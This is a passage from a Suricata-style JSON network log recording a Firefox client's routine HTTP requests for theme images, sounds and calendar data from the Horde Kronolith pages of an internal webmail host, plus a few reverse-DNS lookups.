Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":744},"app_proto":"http","fileinfo":{"filename":"\/js\/sidebar.js","state":"CLOSED","stored":false,"size":1978,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.044683+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151}} {"timestamp":"2020-02-29T00:26:20.046209+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776}} {"timestamp":"2020-02-29T00:26:20.044629+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/search-topbar.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":363},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/search-topbar.png","state":"CLOSED","stored":false,"size":363,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.076688+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256}} {"timestamp":"2020-02-29T00:26:20.077992+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/jetsndb.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.078718+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:26:20.077807+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/theetone.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24776},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/theetone.wav","state":"CLOSED","stored":false,"size":24776,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.078388+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74}} {"timestamp":"2020-02-29T00:26:20.079100+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.079595+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101}} {"timestamp":"2020-02-29T00:26:20.079716+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292}} {"timestamp":"2020-02-29T00:26:20.080724+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":74},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-split.png","state":"CLOSED","stored":false,"size":74,"tx_id":2}} {"timestamp":"2020-02-29T00:26:20.082215+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-active-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":101},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-active-bg.png","state":"CLOSED","stored":false,"size":101,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.082235+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:26:20.082670+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":3}} {"timestamp":"2020-02-29T00:26:20.082847+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.083414+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:26:20.083613+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/left.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":292},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/left.png","state":"CLOSED","stored":false,"size":292,"tx_id":8}} {"timestamp":"2020-02-29T00:26:20.083771+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53156,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.084509+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} {"timestamp":"2020-02-29T00:26:20.085673+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:26:20.087589+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":12}} {"timestamp":"2020-02-29T00:26:20.086399+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.086773+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:26:20.087255+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":9}} {"timestamp":"2020-02-29T00:26:20.088703+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53158,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} {"timestamp":"2020-02-29T00:26:20.125287+0000","flow_id":1460171568849225,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53156,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:26:20.129244+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349}} {"timestamp":"2020-02-29T00:26:20.129190+0000","flow_id":371298575065439,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53158,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-split.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:26:20.129324+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87}} {"timestamp":"2020-02-29T00:26:20.153731+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":13}} {"timestamp":"2020-02-29T00:26:20.154066+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:26:20.201408+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":40121,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24589,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.234800+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":14}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:20.309691+0000","flow_id":1375831296053952,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":40121,"proto":"UDP","dns":{"type":"answer","id":24589,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638}} {"timestamp":"2020-02-29T00:26:20.364046+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.398232+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":638},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":15}} {"timestamp":"2020-02-29T00:26:20.409015+0000","flow_id":1007619454811575,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":36501,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64994,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:20.418063+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/slidevert-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":87},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/slidevert-bg.png","state":"CLOSED","stored":false,"size":87,"tx_id":10}} {"timestamp":"2020-02-29T00:26:20.418385+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:26:20.424480+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":11}} {"timestamp":"2020-02-29T00:26:20.425560+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53154,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":0}} {"timestamp":"2020-02-29T00:26:20.425832+0000","flow_id":1673743112610025,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53154,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} 